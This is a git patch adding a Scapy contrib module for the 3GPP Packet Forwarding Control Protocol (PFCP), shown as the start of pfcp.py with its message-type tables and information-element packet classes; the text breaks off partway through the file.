Subject: [PATCH 0074/1632] Add PFCP module This adds support for Packet Forwarding Control Protocol (PFCP) [1] as described in 3GPP TS 29.244 [2]. The testing is done using pcap file generated using pfcplib [3]. 15.x version of spec is more or less completely implemented, with some of 16.x fields being supported, too. [1] https://en.wikipedia.org/wiki/PFCP [2] https://portal.3gpp.org/desktopmodules/Specifications/SpecificationDetails.aspx?specificationId=3111 [3] https://github.com/travelping/pfcplib --- scapy/contrib/pfcp.py | 2648 +++++++++++++++++++++++++++++++++++++++++ test/contrib/pfcp.uts | 791 ++++++++++++ test/pcaps/pfcp.pcap | Bin 0 -> 46260 bytes 3 files changed, 3439 insertions(+) create mode 100644 scapy/contrib/pfcp.py create mode 100644 test/contrib/pfcp.uts create mode 100644 test/pcaps/pfcp.pcap diff --git a/scapy/contrib/pfcp.py b/scapy/contrib/pfcp.py new file mode 100644 index 00000000000..9d6b247b53f --- /dev/null +++ b/scapy/contrib/pfcp.py @@ -0,0 +1,2648 @@ +#! /usr/bin/env python + +# Copyright (C) 2019 Travelping GmbH + +# This file is part of Scapy +# Scapy is free software: you can redistribute it and/or modify +# it under the terms of the GNU General Public License as published by +# the Free Software Foundation, either version 2 of the License, or +# any later version. +# +# Scapy is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with Scapy. If not, see . + +# 3GPP TS 29.244 + +# scapy.contrib.description = 3GPP Packet Forwarding Control Protocol +# scapy.contrib.status = loads + +import struct + +from scapy.compat import chb, orb +from scapy.error import warning +from scapy.fields import Field, BitEnumField, BitField, ByteEnumField, \ + ShortEnumField, ByteField, IntField, LongField, \ + ConditionalField, FieldLenField, BitFieldLenField, FieldListField, \ + IPField, MACField, PacketListField, ShortField, \ + StrLenField, StrField, XBitField, XByteField, XIntField, XLongField, \ + ThreeBytesField, SignedLongField, SignedIntField, MultipleTypeField +from scapy.layers.inet import UDP +from scapy.layers.inet6 import IP6Field +from scapy.data import IANA_ENTERPRISE_NUMBERS +from scapy.packet import bind_layers, bind_bottom_up, \ + Packet, Raw +from scapy.volatile import RandNum, RandBin + +PFCPmessageType = { + 1: "heartbeat_request", + 2: "heartbeat_response", + 3: "pfd_management_request", + 4: "pfd_management_response", + 5: "association_setup_request", + 6: "association_setup_response", + 7: "association_update_request", + 8: "association_update_response", + 9: "association_release_request", + 10: "association_release_response", + 11: "version_not_supported_response", + 12: "node_report_request", + 13: "node_report_response", + 14: "session_set_deletion_request", + 15: "session_set_deletion_response", + 50: "session_establishment_request", + 51: "session_establishment_response", + 52: "session_modification_request", + 53: "session_modification_response", + 54: "session_deletion_request", + 55: "session_deletion_response", + 56: "session_report_request", + 57: "session_report_response", +} + +IEType = { + 0: "Reserved", + 1: "Create PDR", + 2: "PDI", + 3: "Create FAR", + 4: "Forwarding Parameters", + 5: "Duplicating Parameters", + 6: "Create URR", + 7: "Create QER", + 8: "Created PDR", + 9: "Update PDR", + 10: "Update FAR", + 11: "Update Forwarding Parameters", + 12: "Update BAR (PFCP Session Report Response)", + 13: "Update URR", + 14: "Update QER", + 15: "Remove PDR", + 16: "Remove FAR", + 17: "Remove URR", + 18: "Remove QER", + 19: "Cause", + 20: "Source Interface", + 21: "F-TEID", + 22: "Network Instance", + 23: "SDF Filter", + 24: "Application ID", + 25: "Gate Status", + 26: "MBR", + 27: "GBR", + 28: "QER Correlation ID", + 29: "Precedence", + 30: "Transport Level Marking", + 31: "Volume Threshold", + 32: "Time Threshold", + 33: "Monitoring Time", + 34: "Subsequent Volume Threshold", + 35: "Subsequent Time Threshold", + 36: "Inactivity Detection Time", + 37: "Reporting Triggers", + 38: "Redirect Information", + 39: "Report Type", + 40: "Offending IE", + 41: "Forwarding Policy", + 42: "Destination Interface", + 43: "UP Function Features", + 44: "Apply Action", + 45: "Downlink Data Service Information", + 46: "Downlink Data Notification Delay", + 47: "DL Buffering Duration", + 48: "DL Buffering Suggested Packet Count", + 49: "PFCPSMReq-Flags", + 50: "PFCPSRRsp-Flags", + 51: "Load Control Information", + 52: "Sequence Number", + 53: "Metric", + 54: "Overload Control Information", + 55: "Timer", + 56: "PDR ID", + 57: "F-SEID", + 58: "Application ID's PFDs", + 59: "PFD context", + 60: "Node ID", + 61: "PFD contents", + 62: "Measurement Method", + 63: "Usage Report Trigger", + 64: "Measurement Period", + 65: "FQ-CSID", + 66: "Volume Measurement", + 67: "Duration Measurement", + 68: "Application Detection Information", + 69: "Time of First Packet", + 70: "Time of Last Packet", + 71: "Quota Holding Time", + 72: "Dropped DL Traffic Threshold", + 73: "Volume Quota", + 74: "Time Quota", + 75: "Start Time", + 76: "End Time", + 77: "Query URR", + 78: "Usage Report (Session Modification Response)", + 79: "Usage Report (Session Deletion Response)", + 80: "Usage Report (Session Report Request)", + 81: "URR ID", + 82: "Linked URR ID", + 83: "Downlink Data Report", + 84: "Outer Header Creation", + 85: "Create BAR", + 86: "Update BAR (Session Modification Request)", + 87: "Remove BAR", + 88: "BAR ID", + 89: "CP Function Features", + 90: "Usage Information", + 91: "Application Instance ID", + 92: "Flow Information", + 93: "UE IP Address", + 94: "Packet Rate", + 95: "Outer Header Removal", + 96: "Recovery Time Stamp", + 97: "DL Flow Level Marking", + 98: "Header Enrichment", + 99: "Error Indication Report", + 100: "Measurement Information", + 101: "Node Report Type", + 102: "User Plane Path Failure Report", + 103: "Remote GTP-U Peer", + 104: "UR-SEQN", + 105: "Update Duplicating Parameters", + 106: "Activate Predefined Rules", + 107: "Deactivate Predefined Rules", + 108: "FAR ID", + 109: "QER ID", + 110: "OCI Flags", + 111: "PFCP Association Release Request", + 112: "Graceful Release Period", + 113: "PDN Type", + 114: "Failed Rule ID", + 115: "Time Quota Mechanism", + 116: "User Plane IP Resource Information", + 117: "User Plane Inactivity Timer", + 118: "Aggregated URRs", + 119: "Multiplier", + 120: "Aggregated URR ID", + 121: "Subsequent Volume Quota", + 122: "Subsequent Time Quota", + 123: "RQI", + 124: "QFI", + 125: "Query URR Reference", + 126: "Additional Usage Reports Information", + 127: "Create Traffic Endpoint", + 128: "Created Traffic Endpoint", + 129: "Update Traffic Endpoint", + 130: "Remove Traffic Endpoint", + 131: "Traffic Endpoint ID", + 132: "Ethernet Packet Filter", + 133: "MAC Address", + 134: "C-TAG", + 135: "S-TAG", + 136: "Ethertype", + 137: "Proxying", + 138: "Ethernet Filter ID", + 139: "Ethernet Filter Properties", + 140: "Suggested Buffering Packets Count", + 141: "User ID", + 142: "Ethernet PDU Session Information", + 143: "Ethernet Traffic Information", + 144: "MAC Addresses Detected", + 145: "MAC Addresses Removed", + 146: "Ethernet Inactivity Timer", + 147: "Additional Monitoring Time", + 148: "Event Quota", + 149: "Event Threshold", + 150: "Subsequent Event Quota", + 151: "Subsequent Event Threshold", + 152: "Trace Information", + 153: "Framed-Route", + 154: "Framed-Routing", + 155: "Framed-IPv6-Route", + 156: "Event Time Stamp", + 157: "Averaging Window", + 158: "Paging Policy Indicator", + 159: "APN/DNN", + 160: "3GPP Interface Type", +} + +CauseValues = { + 0: "Reserved", + 1: "Request accepted", + 64: "Request rejected", + 65: "Session context not found", + 66: "Mandatory IE missing", + 67: "Conditional IE missing", + 68: "Invalid length", + 69: "Mandatory IE incorrect", + 70: "Invalid Forwarding Policy", + 71: "Invalid F-TEID allocation option", + 72: "No established Sx Association", + 73: "Rule creation/modification Failure", + 74: "PFCP entity in congestion", + 75: "No resources available", + 76: "Service not supported", + 77: "System failure", +} + +SourceInterface = { + 0: "Access", + 1: "Core", + 2: "SGi-LAN/N6-LAN", + 3: "CP-function", +} + +DestinationInterface = { + 0: "Access", + 1: "Core", + 2: "SGi-LAN/N6-LAN", + 3: "CP-function", + 4: "LI function", +} + +RedirectAddressType = { + 0: "IPv4 address", + 1: "IPv6 address", + 2: "URL", + 3: "SIP URI", +} + +GateStatus = { + 0: "OPEN", + 1: "CLOSED", + 2: "CLOSED_RESERVED_2", + 3: "CLOSED_RESERVED_3", +} + +TimerUnit = { + 0: '2 seconds', + 1: '1 minute', + 2: '10 minutes', + 3: '1 hour', + 4: '10 hours', + 7: 'infinite', +} + +OuterHeaderRemovalDescription = { + 0: "GTP-U/UDP/IPv4", + 1: "GTP-U/UDP/IPv6", + 2: "UDP/IPv4", + 3: "UDP/IPv6", + 4: "IPv4", + 5: "IPv6", + 6: "GTP-U/UDP/IP", + 7: "VLAN S-TAG", + 8: "S-TAG and C-TAG", +} + +NodeIdType = { + 0: "IPv4", + 1: "IPv6", + 2: "FQDN", +} + +FqCSIDNodeIdType = { + 0: "IPv4", + 1: "IPv6", + 2: "MCCMNCId", +} + +FlowDirection = { + 0: "Unspecified", + 1: "Downlink", # traffic to the UE + 2: "Uplink", # traffic from the UE + 3: "Bidirectional", + 4: "Unspecified4", + 5: "Unspecified5", + 6: "Unspecified6", + 7: "Unspecified7", +} + +TimeUnit = { + 0: "minute", + 1: "6 minutes", + 2: "hour", + 3: "day", + 4: "week", + 5: "min5", # same as 0 (minute) + 6: "min6", # same as 0 (minute) + 7: "min7", # same as 0 (minute) +} + +HeaderType = { + 0: "HTTP", +} + +PDNType = { + 0: "IPv4", + 1: "IPv6", + 2: "IPv4v6", + 3: "Non-IP", + 4: "Ethernet", +} + +RuleIDType = { + 0: "PDR", + 1: "FAR", + 2: "QER", + 3: "URR", + 4: "BAR", + # TODO: other values should be interpreted as '1' if received +} + +BaseTimeInterval = { + 0: "CTP", + 1: "DTP", +} + +InterfaceType = { + 0: "S1-U", + 1: "S5 /S8-U", + 2: "S4-U", + 3: "S11-U", + 4: "S12-U", + 5: "Gn/Gp-U", + 6: "S2a-U", + 7: "S2b-U", + 8: "eNodeB GTP-U interface for DL data forwarding", + 9: "eNodeB GTP-U interface for UL data forwarding", + 10: "SGW/UPF GTP-U interface for DL data forwarding", + 11: "N3 3GPP Access", + 12: "N3 Trusted Non-3GPP Access", + 13: "N3 Untrusted Non-3GPP Access", + 14: "N3 for data forwarding", + 15: "N9", +} + + +class PFCPLengthMixin(object): + def post_build(self, p, pay): + p += pay + if self.length is None: + tmp_len = len(p) - 4 + p = p[:2] + struct.pack("!H", tmp_len) + p[4:] + return p + + +class PFCP(PFCPLengthMixin, Packet): + # 3GPP TS 29.244 V15.6.0 (2019-07) + # without the version + name = "PFCP (v1) Header" + fields_desc = [ + BitField("version", 1, 3), + XBitField("spare_b2", 0, 1), + XBitField("spare_b3", 0, 1), + XBitField("spare_b4", 0, 1), + BitField("MP", 0, 1), + BitField("S", 1, 1), + ByteEnumField("message_type", None, PFCPmessageType), + ShortField("length", None), + ConditionalField(XLongField("seid", 0), + lambda pkt:pkt.S == 1), + ThreeBytesField("seq", 0), + ConditionalField(BitField("priority", 0, 4), + lambda pkt:pkt.MP == 1), + ConditionalField(BitField("spare_p", 0, 4), + lambda pkt:pkt.MP == 1), + ConditionalField(ByteField("spare_oct", 0), + lambda pkt:pkt.MP == 0), + ] + + def hashret(self): + return struct.pack("B", self.version) + struct.pack("I", self.seq) + \ + self.payload.hashret() + + def answers(self, other): + return (isinstance(other, PFCP) and + self.version == other.version and + self.seq == other.seq and + self.payload.answers(other.payload)) + + +class APNStrLenField(StrLenField): + # Inspired by DNSStrField + def m2i(self, pkt, s): + ret_s = b"" + tmp_s = s + while tmp_s: + tmp_len = orb(tmp_s[0]) + 1 + if tmp_len > len(tmp_s): + warning("APN prematured end of character-string (size=%i, remaining bytes=%i)" % (tmp_len, len(tmp_s))) # noqa: E501 + ret_s += tmp_s[1:tmp_len] + tmp_s = tmp_s[tmp_len:] + if len(tmp_s): + ret_s += b"." + s = ret_s + return s + + def i2m(self, pkt, s): + s = b"".join(chb(len(x)) + x for x in s.split(b".")) + return s + + +class ExtraDataField(StrField): + def __init__(self, name, default=b""): + StrField.__init__(self, name, default) + + def addfield(self, pkt, s, val): + return s + self.i2m(pkt, val) + + def getfield(self, pkt, s): + # + 4 accounts for the ietype and length fields + p = len(pkt.original) - len(s) + length = pkt.length + 4 - p + return s[length:], self.m2i(pkt, s[:length]) + + def randval(self): + return RandBin(RandNum(0, 2)) + + +class Int40Field(Field): + def __init__(self, name, default): + Field.__init__(self, name, default, "BI") + + def addfield(self, pkt, s, val): + val = self.i2m(pkt, val) + return s + struct.pack("!BI", val >> 32, val & 0xffffffff) + + def getfield(self, pkt, s): + hi, lo = struct.unpack("!BI", s[:5]) + return s[5:], self.m2i(pkt, (hi << 32) + lo) + + def randval(self): + return RandNum(0, 2**40 - 1) + + +def IE_Dispatcher(s): + """Choose the correct Information Element class.""" + + # Get the IE type + ietype = (orb(s[0]) * 256) + orb(s[1]) + if ietype & 0x8000: + return IE_EnterpriseSpecific(s) + + cls = ietypecls.get(ietype, Raw) + if cls is Raw: + cls = IE_NotImplemented + + return cls(s) + + +class IE_Base(PFCPLengthMixin, Packet): + default_length = None + + def __init__(self, *args, **kwargs): + self.fields_desc[0].default = self.ie_type + self.fields_desc[1].default = self.default_length + super(IE_Base, self).__init__(*args, **kwargs) + + def extract_padding(self, pkt): + return "", pkt + + fields_desc = [ + ShortEnumField("ietype", 0, IEType), + ShortField("length", None) + ] + + +class IE_Compound(IE_Base): + fields_desc = IE_Base.fields_desc + [ + PacketListField("IE_list", None, IE_Dispatcher, + length_from=lambda pkt: pkt.length) + ] + + +class IE_CreatePDR(IE_Compound): + name = "IE Create PDR" + ie_type = 1 + + +class IE_PDI(IE_Compound): + name = "IE PDI" + ie_type = 2 + + +class IE_CreateFAR(IE_Compound): + name = "IE Create FAR" + ie_type = 3 + + +class IE_ForwardingParameters(IE_Compound): + name = "IE Forwarding Parameters" + ie_type = 4 + + +class IE_DuplicatingParameters(IE_Compound): + name = "IE Duplicating Parameters" + ie_type = 5 + + +class IE_CreateURR(IE_Compound): + name = "IE Create URR" + ie_type = 6 + + +class IE_CreateQER(IE_Compound): + name = "IE Create QER" + ie_type = 7 + + +class IE_CreatedPDR(IE_Compound): + name = "IE Created PDR" + ie_type = 8 + + +class IE_UpdatePDR(IE_Compound): + name = "IE Update PDR" + ie_type = 9 + + +class IE_UpdateFAR(IE_Compound): + name = "IE Update FAR" + ie_type = 10 + + +class IE_UpdateForwardingParameters(IE_Compound): + name = "IE Update Forwarding Parameters" + ie_type = 11 + + +class IE_UpdateBAR_SRR(IE_Compound): + name = "IE Update BAR (PFCP Session Report Response)" + ie_type = 12 + + +class IE_UpdateURR(IE_Compound): + name = "IE Update URR" + ie_type = 13 + + +class IE_UpdateQER(IE_Compound): + name = "IE Update QER" + ie_type = 14 + + +class IE_RemovePDR(IE_Compound): + name = "IE Remove PDR" + ie_type = 15 + + +class IE_RemoveFAR(IE_Compound): + name = "IE Remove FAR" + ie_type = 16 + + +class IE_RemoveURR(IE_Compound): + name = "IE Remove URR" + ie_type = 17 + + +class IE_RemoveQER(IE_Compound): + name = "IE Remove QER" + ie_type = 18 + + +class IE_LoadControlInformation(IE_Compound): + name = "IE Load Control Information" + ie_type = 51 + + +class IE_OverloadControlInformation(IE_Compound): + name = "IE Overload Control Information" + ie_type = 54 + + +class IE_ApplicationID_PFDs(IE_Compound): + name = "IE Application ID's PFDs" + ie_type = 58 + + +class IE_PFDContext(IE_Compound): + name = "IE PFD context" + ie_type = 59 + + +class IE_ApplicationDetectionInformation(IE_Compound): + name = "IE Application Detection Information" + ie_type = 68 + + +class IE_QueryURR(IE_Compound): + name = "IE Query URR" + ie_type = 77 + + +class IE_UsageReport_SMR(IE_Compound): + name = "IE Usage Report (Session Modification Response)" + ie_type = 78 + + +class IE_UsageReport_SDR(IE_Compound): + name = "IE Usage Report (Session Deletion Response)" + ie_type = 79 + + +class IE_UsageReport_SRR(IE_Compound): + name = "IE Usage Report (Session Report Request)" + ie_type = 80 + + +class IE_DownlinkDataReport(IE_Compound): + name = "IE Downlink Data Report" + ie_type = 83 + + +class IE_Create_BAR(IE_Compound): + name = "IE Create BAR" + ie_type = 85 + + +class IE_Update_BAR_SMR(IE_Compound): + name = "IE Update BAR (Session Modification Request)" + ie_type = 86 + + +class IE_Remove_BAR(IE_Compound): + name = "IE Remove BAR" + ie_type = 87 + + +class IE_ErrorIndicationReport(IE_Compound): + name = "IE Error Indication Report" + ie_type = 99 + + +class IE_UserPlanePathFailureReport(IE_Compound): + name = "IE User Plane Path Failure Report" + ie_type = 102 + + +class IE_UpdateDuplicatingParameters(IE_Compound): + name = "IE Update Duplicating Parameters" + ie_type = 105 + + +class IE_AggregatedURRs(IE_Compound): + name = "IE Aggregated URRs" + ie_type = 118 + + +class IE_CreateTrafficEndpoint(IE_Compound): + name = "IE Create Traffic Endpoint" + ie_type = 127 + + +class IE_CreatedTrafficEndpoint(IE_Compound): + name = "IE Created Traffic Endpoint" + ie_type = 128 + + +class IE_UpdateTrafficEndpoint(IE_Compound): + name = "IE Update Traffic Endpoint" + ie_type = 129 + + +class IE_RemoveTrafficEndpoint(IE_Compound): + name = "IE Remove Traffic Endpoint" + ie_type = 130 + + +class IE_EthernetPacketFilter(IE_Compound): + name = "IE Ethernet Packet Filter" + ie_type = 132 + + +class IE_EthernetTrafficInformation(IE_Compound): + name = "IE Ethernet Traffic Information" + ie_type = 143 + + +class IE_AdditionalMonitoringTime(IE_Compound): + name = "IE Additional Monitoring Time" + ie_type = 147 + + +class IE_Cause(IE_Base): + ie_type = 19 + name = "IE Cause" + fields_desc = IE_Base.fields_desc + [ + ByteEnumField("cause", None, CauseValues) + ] + + +class IE_SourceInterface(IE_Base): + name = "IE Source Interface" + ie_type = 20 + fields_desc = IE_Base.fields_desc + [ + XBitField("spare", 0, 4), + BitEnumField("interface", "Access", 4, SourceInterface), + ExtraDataField("extra_data"), + ] + + +class IE_FTEID(IE_Base): + name = "IE F-TEID" + ie_type = 21 + fields_desc = IE_Base.fields_desc + [ + XBitField("spare", 0, 4), + BitField("CHID", 0, 1), + BitField("CH", 0, 1), + BitField("V6", 0, 1), + BitField("V4", 0, 1), + ConditionalField(XIntField("TEID", 0), lambda x: x.CH == 0), + ConditionalField(IPField("ipv4", 0), + lambda x: x.V4 == 1 and x.CH == 0), + ConditionalField(IP6Field("ipv6", 0), + lambda x: x.V6 == 1 and x.CH == 0), + ConditionalField(ByteField("choose_id", 0), + lambda x: x.CHID == 1), + ExtraDataField("extra_data"), + ] + + +class IE_NetworkInstance(IE_Base): + name = "IE Network Instance" + ie_type = 22 + fields_desc = IE_Base.fields_desc + [ + APNStrLenField("instance", "", length_from=lambda x: x.length) + ] + + +class IE_SDF_Filter(IE_Base): + name = "IE SDF Filter" + ie_type = 23 + fields_desc = IE_Base.fields_desc + [ + XBitField("spare", 0, 3), + BitField("BID", 0, 1), + BitField("FL", 0, 1), + BitField("SPI", 0, 1), + BitField("TTC", 0, 1), + BitField("FD", 0, 1), + ByteField("spare_oct", 0), + ConditionalField(FieldLenField("flow_description_length", None, + length_of="flow_description"), + lambda pkt: pkt.FD == 1), + ConditionalField(StrLenField("flow_description", "", + length_from=lambda pkt: + pkt.flow_description_length), + lambda pkt: pkt.FD == 1), + ConditionalField(ByteField("tos_traffic_class", 0), + lambda pkt: pkt.TTC == 1), + ConditionalField(ByteField("tos_traffic_mask", 0), + lambda pkt: pkt.TTC == 1), + ConditionalField(IntField("security_parameter_index", 0), + lambda pkt: pkt.SPI == 1), + ConditionalField(ThreeBytesField("flow_label", 0), + lambda pkt: pkt.FL == 1), + ConditionalField(IntField("sdf_filter_id", 0), + lambda pkt: pkt.BID == 1), + ExtraDataField("extra_data"), + ] + + +class IE_ApplicationId(IE_Base): + name = "IE Application ID" + ie_type = 24 + fields_desc = IE_Base.fields_desc + [ + StrLenField("id", "", length_from=lambda x: x.length), + ] + + +class IE_GateStatus(IE_Base): + name = "IE Gate Status" + ie_type = 25 + fields_desc = IE_Base.fields_desc + [ + XBitField("spare", 0, 4), + BitEnumField("ul", "OPEN", 2, GateStatus), + BitEnumField("dl", "OPEN", 2, GateStatus), + ExtraDataField("extra_data"), + ] + + +class IE_MBR(IE_Base): + name = "IE MBR" + ie_type = 26 + fields_desc = IE_Base.fields_desc + [ + Int40Field("ul", 0), + Int40Field("dl", 0), + ExtraDataField("extra_data"), + ] + + +class IE_GBR(IE_Base): + name = "IE GBR" + ie_type = 27 + fields_desc = IE_Base.fields_desc + [ + Int40Field("ul", 0), + Int40Field("dl", 0), + ExtraDataField("extra_data"), + ] + + +class IE_QERCorrelationId(IE_Base): + name = "IE QER Correlation ID" + ie_type = 28 + fields_desc = IE_Base.fields_desc + [ + IntField("id", 0), + ExtraDataField("extra_data"), + ] + + +class IE_Precedence(IE_Base): + name = "IE Precedence" + ie_type = 29 + fields_desc = IE_Base.fields_desc + [ + IntField("precedence", 0), + ExtraDataField("extra_data"), + ] + + +class IE_TransportLevelMarking(IE_Base): + name = "IE Transport Level Marking" + ie_type = 30 + fields_desc = IE_Base.fields_desc + [ + XByteField("tos", 0), + XByteField("traffic_class", 0), + ExtraDataField("extra_data"), + ] + + +class IE_VolumeThreshold(IE_Base): + name = "IE Volume Threshold" + ie_type = 31 + fields_desc = IE_Base.fields_desc + [ + XBitField("spare", 0, 5), + BitField("DLVOL", 0, 1), + BitField("ULVOL", 0, 1), + BitField("TOVOL", 0, 1), + ConditionalField(XLongField("total", 0), lambda x: x.TOVOL == 1), + ConditionalField(XLongField("uplink", 0), lambda x: x.ULVOL == 1), + ConditionalField(XLongField("downlink", 0), lambda x: x.DLVOL == 1), + ExtraDataField("extra_data"), + ] + + +class IE_TimeThreshold(IE_Base): + name = "IE Time Threshold" + ie_type = 32 + fields_desc = IE_Base.fields_desc + [ + IntField("threshold", 0), + ExtraDataField("extra_data"), + ] + + +class IE_MonitoringTime(IE_Base): + name = "IE Monitoring Time" + ie_type = 33 + fields_desc = IE_Base.fields_desc + [ + IntField("time_value", 0), + ExtraDataField("extra_data"), + ] + + +class IE_SubsequentVolumeThreshold(IE_Base): + name = "IE Subsequent Volume Threshold" + ie_type = 34 + fields_desc = IE_Base.fields_desc + [ + XBitField("spare", 0, 5), + BitField("DLVOL", 0, 1), + BitField("ULVOL", 0, 1), + BitField("TOVOL", 0, 1), + ConditionalField(XLongField("total", 0), lambda x: x.TOVOL == 1), + ConditionalField(XLongField("uplink", 0), lambda x: x.ULVOL == 1), + ConditionalField(XLongField("downlink", 0), lambda x: x.DLVOL == 1), + ExtraDataField("extra_data"), + ] + + +class IE_SubsequentTimeThreshold(IE_Base): + name = "IE Subsequent Time Threshold" + ie_type = 35 + fields_desc = IE_Base.fields_desc + [ + IntField("threshold", 0), + ExtraDataField("extra_data"), + ] + + +class IE_InactivityDetectionTime(IE_Base): + name = "IE Inactivity Detection Time" + ie_type = 36 + fields_desc = IE_Base.fields_desc + [ + IntField("time_value", 0), + ExtraDataField("extra_data"), + ] + + +class IE_ReportingTriggers(IE_Base): + name = "IE Reporting Triggers" + ie_type = 37 + fields_desc = IE_Base.fields_desc + [ + BitField("linked_usage_reporting", 0, 1), + BitField("dropped_dl_traffic_threshold", 0, 1), + BitField("stop_of_traffic", 0, 1), + BitField("start_of_traffic", 0, 1), + BitField("quota_holding_time", 0, 1), + BitField("time_threshold", 0, 1), + BitField("volume_threshold", 0, 1), + BitField("periodic_reporting", 0, 1), + XBitField("spare", 0, 2), + BitField("event_quota", 0, 1), + BitField("event_threshold", 0, 1), + BitField("mac_addresses_reporting", 0, 1), + BitField("envelope_closure", 0, 1), + BitField("time_quota", 0, 1), + BitField("volume_quota", 0, 1), + ExtraDataField("extra_data"), + ] + + +class IE_RedirectInformation(IE_Base): + name = "IE Redirect Information" + ie_type = 38 + fields_desc = IE_Base.fields_desc + [ + XBitField("spare", 0, 4), + BitEnumField("type", "IPv4 address", 4, RedirectAddressType), + FieldLenField("address_length", None, length_of="address"), + StrLenField("address", "", length_from=lambda pkt: pkt.address_length), + ExtraDataField("extra_data"), + ] + + +class IE_ReportType(IE_Base): + name = "IE Report Type" + ie_type = 39 + fields_desc = IE_Base.fields_desc + [ + XBitField("spare", 0, 4), + BitField("UPIR", 0, 1), + BitField("ERIR", 0, 1), + BitField("USAR", 0, 1), + BitField("DLDR", 0, 1), + ExtraDataField("extra_data"), + ] + + +class IE_OffendingIE(IE_Base): + name = "IE Offending IE" + ie_type = 40 + fields_desc = IE_Base.fields_desc + [ + ShortEnumField("type", None, IEType) + ] + + +class IE_ForwardingPolicy(IE_Base): + name = "IE Forwarding Policy" + ie_type = 41 + fields_desc = IE_Base.fields_desc + [ + FieldLenField("policy_identifier_length", None, + length_of="policy_identifier", fmt="B"), + StrLenField("policy_identifier", "", + length_from=lambda pkt: pkt.policy_identifier_length) + ] + + +class IE_DestinationInterface(IE_Base): + name = "IE Destination Interface" + ie_type = 42 + fields_desc = IE_Base.fields_desc + [ + XBitField("spare", 0, 4), + BitEnumField("interface", "Access", 4, DestinationInterface), + ExtraDataField("extra_data"), + ] + + +class IE_UPFunctionFeatures(IE_Base): + name = "IE UP Function Features" + ie_type = 43 + default_length = 2 + fields_desc = IE_Base.fields_desc + [ + ConditionalField(BitField("TREU", None, 1), lambda x: x.length > 0), + ConditionalField(BitField("HEEU", None, 1), lambda x: x.length > 0), + ConditionalField(BitField("PFDM", None, 1), lambda x: x.length > 0), + ConditionalField(BitField("FTUP", None, 1), lambda x: x.length > 0), + + ConditionalField(BitField("TRST", None, 1), lambda x: x.length > 0), + ConditionalField(BitField("DLBD", None, 1), lambda x: x.length > 0), + ConditionalField(BitField("DDND", None, 1), lambda x: x.length > 0), + ConditionalField(BitField("BUCP", None, 1), lambda x: x.length > 0), + + ConditionalField(BitField("spare", None, 1), lambda x: x.length > 1), + ConditionalField(BitField("PFDE", None, 1), lambda x: x.length > 1), + ConditionalField(BitField("FRRT", None, 1), lambda x: x.length > 1), + ConditionalField(BitField("TRACE", None, 1), lambda x: x.length > 1), + + ConditionalField(BitField("QUOAC", None, 1), lambda x: x.length > 1), + ConditionalField(BitField("UDBC", None, 1), lambda x: x.length > 1), + ConditionalField(BitField("PDIU", None, 1), lambda x: x.length > 1), + ConditionalField(BitField("EMPU", None, 1), lambda x: x.length > 1), + + ExtraDataField("extra_data"), + ] + + +class IE_ApplyAction(IE_Base): + name = "IE Apply Action" + ie_type = 44 + fields_desc = IE_Base.fields_desc + [ + XBitField("spare", None, 3), + BitField("DUPL", 0, 1), + BitField("NOCP", 0, 1), + BitField("BUFF", 0, 1), + BitField("FORW", 0, 1), + BitField("DROP", 0, 1), + ExtraDataField("extra_data"), + ] + + +class IE_DownlinkDataServiceInformation(IE_Base): + name = "IE Downlink Data Service Information" + ie_type = 45 + fields_desc = IE_Base.fields_desc + [ + XBitField("spare_1", None, 6), + BitField("QFII", 0, 1), + BitField("PPI", 0, 1), + ConditionalField( + XBitField("spare_2", None, 2), + lambda x: x.PPI == 1), + ConditionalField( + XBitField("ppi_val", None, 6), + lambda x: x.PPI == 1), + ConditionalField( + XBitField("spare_3", None, 2), + lambda x: x.QFII == 1), + ConditionalField( + XBitField("qfi_val", None, 6), + lambda x: x.QFII == 1), + ExtraDataField("extra_data"), + ] + + +class IE_DownlinkDataNotificationDelay(IE_Base): + name = "IE Downlink Data Notification Delay" + ie_type = 46 + fields_desc = IE_Base.fields_desc + [ + ByteField("delay", 0), # in multiples of 50 + ExtraDataField("extra_data"), + ] + + +class IE_DLBufferingDuration(IE_Base): + name = "IE DL Buffering Duration" + ie_type = 47 + fields_desc = IE_Base.fields_desc + [ + BitEnumField("timer_unit", "2 seconds", 3, TimerUnit), + BitField("timer_value", 0, 5), + ExtraDataField("extra_data"), + ] + + +class IE_DLBufferingSuggestedPacketCount(IE_Base): + name = "IE DL Buffering Suggested Packet Count" + ie_type = 48 + fields_desc = IE_Base.fields_desc + [ + MultipleTypeField([ + ( + ByteField("count", 0), + (lambda x: x.length == 1, + lambda x, val: x.length == 1 or + (x.length is None and val < 256)), + ), + ( + ShortField("count", 0), + (lambda x: x.length == 2, + lambda x, val: x.length == 1 or + (x.length is None and val >= 256)) + ), + ], ByteField("count", 0)) + ] + + +class IE_PFCPSMReqFlags(IE_Base): + name = "IE PFCPSMReq-Flags" + ie_type = 49 + fields_desc = IE_Base.fields_desc + [ + XBitField("spare", None, 5), + BitField("QUARR", 0, 1), + BitField("SNDEM", 0, 1), + BitField("DROBU", 0, 1), + ExtraDataField("extra_data"), + ] + + +class IE_PFCPSRRspFlags(IE_Base): + name = "IE PFCPSRRsp-Flags" + ie_type = 50 + fields_desc = IE_Base.fields_desc + [ + XBitField("spare", None, 7), + BitField("DROBU", 0, 1), + ExtraDataField("extra_data"), + ] + + +class IE_SequenceNumber(IE_Base): + name = "IE Sequence Number" + ie_type = 52 + fields_desc = IE_Base.fields_desc + [ + IntField("number", 0), + ] + + +class IE_Metric(IE_Base): + name = "IE Metric" + ie_type = 53 + fields_desc = IE_Base.fields_desc + [ + ByteField("metric", 0), + ] + + +class IE_Timer(IE_Base): + name = "IE Timer" + ie_type = 55 + fields_desc = IE_Base.fields_desc + [ + BitEnumField("timer_unit", "2 seconds", 3, TimerUnit), + BitField("timer_value", 0, 5), + ExtraDataField("extra_data"), + ] + + +class IE_PDR_Id(IE_Base): + name = "IE PDR ID" + ie_type = 56 + fields_desc = IE_Base.fields_desc + [ + ShortField("id", 0), + ExtraDataField("extra_data"), + ] + + +class IE_FSEID(IE_Base): + name = "IE F-SEID" + ie_type = 57 + fields_desc = IE_Base.fields_desc + [ + XBitField("spare", 0, 6), + BitField("v4", 0, 1), + BitField("v6", 0, 1), + XLongField("seid", 0), + ConditionalField(IPField("ipv4", 0), + lambda x: x.v4 == 1), + ConditionalField(IP6Field("ipv6", 0), + lambda x: x.v6 == 1), + ExtraDataField("extra_data"), 